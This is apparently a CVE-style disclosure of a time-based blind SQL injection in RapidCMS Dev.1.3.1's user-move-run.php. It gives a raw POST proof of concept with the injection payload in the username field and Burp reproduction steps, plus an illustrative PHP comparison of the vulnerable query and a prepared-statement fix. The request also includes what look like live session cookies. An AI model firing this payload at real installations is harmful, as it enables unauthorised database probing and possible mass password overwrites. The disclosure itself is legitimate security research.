rapidcms user-move-run.php SQL injection

Source: 0kooo/cve_article on Gitee (https://gitee.com/A0kooo/cve_article)
Description of the vulnerability

A SQL injection vulnerability was found in /admin/user/user-move-run.php of RapidCMS Dev.1.3.1.

Affected system

Version

RapidCMS Dev.1.3.1

Project address

https://github.com/OpenRapid/rapidcms

POC

Affected parameter: username. The payload below is a time-based blind test: the server delays its response by about 3 seconds only if the current database name is longer than 4 characters, so the response time answers a yes/no question about the database without any data appearing in the page.

POST /admin/user/user-move-run.php HTTP/1.1
Host: demo.com
Content-Length: 71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://demo.com/admin/user/user-move.php?username=admin
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; csrf_358693=2df7a84f; SECKEY_ABVK=OwAgykiuZ90JyymTDay7TVxsu9K7i77SDQ1wYucKShE%3D; BMAP_SECKEY=zsabggfKizJ7RMP-whUACbv-8Y8e5RtMYzyqN6tgzDDcqlIgvjPYXLThdapgeYvMI5gtvLD423X1mOjreODpLfh2LBSqd-MfWUOnirBpX6X5MhDcI2h78cg9SCeZlworW5OtN5Li7126gdR5a9n2B0G1H09Eu9K-e5yMSsxdwbkojLGWbNKpJSNGySLmO3bA; lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false; preExecutionID=3; executionTaskOrder=status%2Cid_desc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1723680035; http304ok=1; qebak_loginlangid=1; csrf_f2b6b4=adc34ccd; downloading=null; storyModuleParam=0; storyProductParam=0; storyBranchParam=0; executionStoryOrder=order_desc; storyPreExecutionID=3; docSpaceParam=%7B%22type%22%3A%22execution%22%2C%22objectID%22%3A%223%22%2C%22libID%22%3A%227%22%2C%22moduleID%22%3A%220%22%2C%22browseType%22%3A%22%22%2C%22param%22%3A%220%22%7D; lastDocModule=0; lastProject=2; docFilesViewType=list; tab=doc; xinhu_ca_adminuser=admin; xinhu_mo_adminid=eg0el0gx0ttm0tut0et0mx0ml0ea0el0tuj0tuj0ee0tua0ew0mg09; user=Y4W4R2t0a9Wa46O0O0Oa; name=admin; admin=Y4W4R2t0a9Wa46O0O0Oa
Connection: keep-alive

username=' or if(length(database())>4,sleep(3),1)#&password=123456&sub=

Analysis

  1. Locate the vulnerable file

[screenshot]

The username parameter is read straight from the POST body and concatenated into the SQL string, which is then executed with mysqli_query(). Nothing escapes or parameterises the value, so a single quote in username closes the intended string literal and the rest of the input is interpreted as SQL.
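The following is an added illustration, not code from RapidCMS: it reconstructs the pattern the analysis describes (a POSTed username spliced into a SQL string that is run through mysqli_query()) and puts the prepared-statement fix beside it. The table and column names (users, username, password), the use of an UPDATE statement and the connection details are assumptions; the page does not show the project's actual statement.

```php
<?php
// Added illustration, not code from RapidCMS. It reconstructs the pattern the
// analysis describes (POSTed username spliced into a SQL string that is run
// through mysqli_query()) and puts the prepared-statement fix beside it.
// Assumptions: the statement is an UPDATE of a `users` table with `username`
// and `password` columns, and the connection details below.

$conn = new mysqli('127.0.0.1', 'rapidcms', 'secret', 'rapidcms'); // assumed credentials
$conn->set_charset('utf8mb4');

// VULNERABLE: string concatenation. With
//   username = ' or if(length(database())>4,sleep(3),1)#
// the statement becomes
//   UPDATE users SET password = '...' WHERE username = '' or if(length(database())>4,sleep(3),1)#'
// The # comments out the closing quote, the attacker's condition is evaluated
// for every row, and MySQL sleeps 3 s per evaluated row when it is true.
function change_password_vulnerable(mysqli $conn, string $username, string $password): bool
{
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $sql  = "UPDATE users SET password = '" . $hash . "' WHERE username = '" . $username . "'";
    return mysqli_query($conn, $sql) !== false;
}

// FIXED: the SQL text and the values travel separately, so the payload is
// compared as a literal username and never parsed as SQL.
function change_password_fixed(mysqli $conn, string $username, string $password): int
{
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $conn->prepare('UPDATE users SET password = ? WHERE username = ?');
    $stmt->bind_param('ss', $hash, $username);
    $stmt->execute();
    $rows = $stmt->affected_rows;
    $stmt->close();
    return $rows; // number of accounts actually updated
}

// Defence in depth: the admin page only ever submits an existing account name,
// so reject anything that is not a plausible username before touching the DB.
function is_valid_username(string $u): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $u);
}

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
if (!is_valid_username($username) || $password === '') {
    http_response_code(400);
    exit('invalid input');
}
$updated = change_password_fixed($conn, $username, $password);
echo $updated === 1 ? 'password changed' : 'no such user';
```

Two practical caveats follow from the vulnerable form. First, `or` makes the WHERE clause match every row whenever the injected condition is true, so if the real statement is an UPDATE (an assumption here), the same payload that leaks timing also overwrites every user's password. Second, sleep(3) runs once per row on which the condition is evaluated, so the observed delay is a multiple of 3 seconds that grows with the size of the users table; take a baseline measurement before reading the timing oracle.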

Reproduction

  1. Locate the page where a user's password is changed.

[screenshot]

  2. Enable Burp Suite's intercept beforehand, then enter a new password and click Modify so the request can be edited before it reaches the server.

[screenshot]

  3. Change the username parameter to ' or if(length(database())>4,sleep(3),1)# and forward the request. If the current database name is longer than four characters, the response is delayed by about three seconds.

[screenshot]
